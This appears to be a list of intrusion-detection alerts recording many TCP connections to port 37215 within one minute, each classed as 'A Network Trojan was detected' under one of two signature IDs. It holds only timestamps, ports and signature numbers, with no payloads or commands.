          Timestamp:06/08/24-15:05:25.791805
          SID:2829579
          Source Port:36574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178364
          SID:2829579
          Source Port:39972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705939
          SID:2835222
          Source Port:53942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161600
          SID:2835222
          Source Port:36992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708558
          SID:2835222
          Source Port:41818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554082
          SID:2835222
          Source Port:54544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240713
          SID:2829579
          Source Port:34056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036178
          SID:2835222
          Source Port:42782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552392
          SID:2835222
          Source Port:36988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162830
          SID:2835222
          Source Port:41516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795209
          SID:2829579
          Source Port:45814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796156
          SID:2835222
          Source Port:48928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896103
          SID:2829579
          Source Port:59784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673858
          SID:2829579
          Source Port:41536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114444
          SID:2835222
          Source Port:33558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734896
          SID:2829579
          Source Port:53042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731498
          SID:2835222
          Source Port:51310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176220
          SID:2835222
          Source Port:38136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893954
          SID:2829579
          Source Port:51226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352075
          SID:2829579
          Source Port:41522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180924
          SID:2835222
          Source Port:41514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542843
          SID:2835222
          Source Port:60342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035753
          SID:2829579
          Source Port:37612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704757
          SID:2835222
          Source Port:57932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813204
          SID:2829579
          Source Port:50836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019686
          SID:2835222
          Source Port:36482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746850
          SID:2829579
          Source Port:47584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857244
          SID:2835222
          Source Port:36562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036193
          SID:2829579
          Source Port:53142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158880
          SID:2835222
          Source Port:39826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354692
          SID:2829579
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354348
          SID:2835222
          Source Port:37536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707077
          SID:2835222
          Source Port:52676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354388
          SID:2829579
          Source Port:46814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175346
          SID:2835222
          Source Port:52138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853098
          SID:2835222
          Source Port:37850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160922
          SID:2829579
          Source Port:48950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042751
          SID:2829579
          Source Port:35996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192341
          SID:2835222
          Source Port:46080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269792
          SID:2835222
          Source Port:46570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463195
          SID:2835222
          Source Port:45714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135923
          SID:2829579
          Source Port:54662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513803
          SID:2835222
          Source Port:59684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.821783
          SID:2829579
          Source Port:55432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734551
          SID:2835222
          Source Port:39822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042729
          SID:2829579
          Source Port:58174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175889
          SID:2829579
          Source Port:48804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306348
          SID:2829579
          Source Port:57666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783230
          SID:2835222
          Source Port:49062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461467
          SID:2835222
          Source Port:44570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667858
          SID:2835222
          Source Port:48360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044712
          SID:2829579
          Source Port:53604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161166
          SID:2829579
          Source Port:47514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162730
          SID:2829579
          Source Port:54144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911551
          SID:2835222
          Source Port:44120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857931
          SID:2835222
          Source Port:33576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860848
          SID:2835222
          Source Port:43092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025917
          SID:2829579
          Source Port:43542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263991
          SID:2835222
          Source Port:33322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471171
          SID:2835222
          Source Port:39302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731223
          SID:2835222
          Source Port:38634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892036
          SID:2829579
          Source Port:35230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178374
          SID:2829579
          Source Port:49828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403742
          SID:2835222
          Source Port:55412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516741
          SID:2835222
          Source Port:44242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673857
          SID:2829579
          Source Port:43970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.082997
          SID:2829579
          Source Port:44244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016080
          SID:2829579
          Source Port:40048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041184
          SID:2829579
          Source Port:52892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157963
          SID:2835222
          Source Port:44438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005550
          SID:2829579
          Source Port:39018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354660
          SID:2835222
          Source Port:51062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460989
          SID:2829579
          Source Port:45044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787961
          SID:2835222
          Source Port:46000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542962
          SID:2835222
          Source Port:47238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036515
          SID:2829579
          Source Port:46968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266630
          SID:2835222
          Source Port:47514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174220
          SID:2829579
          Source Port:57250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261007
          SID:2835222
          Source Port:41946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747659
          SID:2829579
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546604
          SID:2835222
          Source Port:36146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853234
          SID:2835222
          Source Port:59784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896614
          SID:2835222
          Source Port:33934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259217
          SID:2835222
          Source Port:54110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306214
          SID:2829579
          Source Port:52634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704400
          SID:2835222
          Source Port:58798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514340
          SID:2835222
          Source Port:49464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740227
          SID:2835222
          Source Port:59106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819214
          SID:2829579
          Source Port:43792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154132
          SID:2835222
          Source Port:48662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129405
          SID:2829579
          Source Port:48334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401886
          SID:2829579
          Source Port:49044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404487
          SID:2835222
          Source Port:46606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378567
          SID:2829579
          Source Port:36322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129607
          SID:2829579
          Source Port:60866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132026
          SID:2829579
          Source Port:42912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409515
          SID:2829579
          Source Port:37678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040171
          SID:2829579
          Source Port:43700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795156
          SID:2829579
          Source Port:33396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854970
          SID:2835222
          Source Port:55046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354811
          SID:2829579
          Source Port:48256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515935
          SID:2829579
          Source Port:38932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395428
          SID:2835222
          Source Port:52210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706554
          SID:2829579
          Source Port:53262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353959
          SID:2835222
          Source Port:39900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738938
          SID:2835222
          Source Port:58366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896516
          SID:2829579
          Source Port:50770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299497
          SID:2829579
          Source Port:37682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271486
          SID:2835222
          Source Port:52912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837472
          SID:2835222
          Source Port:34286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894792
          SID:2829579
          Source Port:35612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860738
          SID:2829579
          Source Port:57982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743529
          SID:2829579
          Source Port:56236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857375
          SID:2835222
          Source Port:39024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860086
          SID:2829579
          Source Port:48032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109224
          SID:2829579
          Source Port:39364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406378
          SID:2835222
          Source Port:52638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081823
          SID:2835222
          Source Port:52142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842168
          SID:2835222
          Source Port:39096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261319
          SID:2835222
          Source Port:40854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158964
          SID:2835222
          Source Port:51284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806864
          SID:2829579
          Source Port:34398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671338
          SID:2829579
          Source Port:55932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404442
          SID:2829579
          Source Port:57070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816920
          SID:2829579
          Source Port:55670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152986
          SID:2829579
          Source Port:43496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781228
          SID:2835222
          Source Port:33172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463023
          SID:2835222
          Source Port:48776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782408
          SID:2835222
          Source Port:48538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667815
          SID:2835222
          Source Port:41672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843745
          SID:2829579
          Source Port:58534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403575
          SID:2835222
          Source Port:39388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276246
          SID:2829579
          Source Port:45390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173380
          SID:2829579
          Source Port:54682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730764
          SID:2835222
          Source Port:45446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854022
          SID:2829579
          Source Port:46960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709050
          SID:2829579
          Source Port:40806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598770
          SID:2829579
          Source Port:39074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705236
          SID:2829579
          Source Port:32836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444806
          SID:2835222
          Source Port:40244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.062902
          SID:2829579
          Source Port:36726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887597
          SID:2829579
          Source Port:33872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352288
          SID:2829579
          Source Port:51042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152895
          SID:2829579
          Source Port:35908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446273
          SID:2835222
          Source Port:52114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546032
          SID:2835222
          Source Port:59554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668202
          SID:2829579
          Source Port:43362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019217
          SID:2829579
          Source Port:54108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236955
          SID:2835222
          Source Port:40604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268304
          SID:2835222
          Source Port:54964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264414
          SID:2835222
          Source Port:52500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912347
          SID:2835222
          Source Port:48044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546700
          SID:2829579
          Source Port:39980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130698
          SID:2835222
          Source Port:57788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233639
          SID:2829579
          Source Port:39926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743341
          SID:2835222
          Source Port:37268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743909
          SID:2835222
          Source Port:36202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258710
          SID:2829579
          Source Port:34064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707649
          SID:2835222
          Source Port:45170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897106
          SID:2829579
          Source Port:43134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275428
          SID:2835222
          Source Port:41042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161599
          SID:2829579
          Source Port:40872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781524
          SID:2835222
          Source Port:37974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175658
          SID:2829579
          Source Port:47074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184588
          SID:2835222
          Source Port:46788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113147
          SID:2835222
          Source Port:51392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267977
          SID:2829579
          Source Port:41058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266183
          SID:2835222
          Source Port:47036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600112
          SID:2835222
          Source Port:42694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745378
          SID:2829579
          Source Port:44442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.159011
          SID:2835222
          Source Port:41032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602613
          SID:2835222
          Source Port:43562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729868
          SID:2829579
          Source Port:40136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511273
          SID:2835222
          Source Port:44762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108179
          SID:2829579
          Source Port:36604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159305
          SID:2835222
          Source Port:53294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894329
          SID:2829579
          Source Port:37816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672257
          SID:2835222
          Source Port:43808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020304
          SID:2829579
          Source Port:35944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893557
          SID:2829579
          Source Port:47352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135412
          SID:2835222
          Source Port:36156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155758
          SID:2835222
          Source Port:53592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857053
          SID:2829579
          Source Port:38264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708085
          SID:2829579
          Source Port:59748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162834
          SID:2835222
          Source Port:43854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709321
          SID:2835222
          Source Port:38960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705713
          SID:2835222
          Source Port:34718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810473
          SID:2835222
          Source Port:51512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731859
          SID:2829579
          Source Port:58906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732643
          SID:2835222
          Source Port:48398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020483
          SID:2829579
          Source Port:44122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509076
          SID:2835222
          Source Port:58604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824896
          SID:2835222
          Source Port:39240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783064
          SID:2829579
          Source Port:59262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127355
          SID:2835222
          Source Port:53272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176768
          SID:2829579
          Source Port:38768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405099
          SID:2829579
          Source Port:42682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267991
